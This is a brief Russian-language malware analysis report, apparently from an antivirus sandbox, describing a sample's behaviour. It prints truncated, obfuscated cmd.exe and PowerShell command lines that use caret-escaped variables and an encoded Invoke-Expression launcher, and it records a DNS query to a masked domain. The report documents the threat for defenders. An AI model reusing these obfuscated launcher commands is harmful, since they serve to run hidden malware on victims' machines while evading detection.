Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' ZjDWOkVFF ChVGVWpoHjcKUibwvV PIfqQXapcsj & %C^om^S^pEc% %C^om^S^pEc% /V /c set %YsEiXtUskbGsNtc%=UwQAmqSK&&set %RpkjBBosa%=p&&set %aRMFJrMGiClVN%=ow&&set ...
Сетевая активность
UDP
- DNS ASK kr#######asndasidhnjqwewq.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' ZjDWOkVFF ChVGVWpoHjcKUibwvV PIfqQXapcsj & %C^om^S^pEc% %C^om^S^pEc% /V /c set %YsEiXtUskbGsNtc%=UwQAmqSK&&set %RpkjBBosa%=p&&set %aRMFJrMGiClVN%=ow&&set ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "&( ([StRInG]$VErbosEPreFereNCE)[1,3]+'X'-jOin'') ( ( [rUNTiMe.intERopseRvIcEs.mARshal]::([rUNTIMe.iNTErOPSerVIcES.MaRSHAL].geTMeMBers()[4].NAMe).iNvOKE([runtIMe.intEroPseRVIcEs.MarShal]::sEcur...
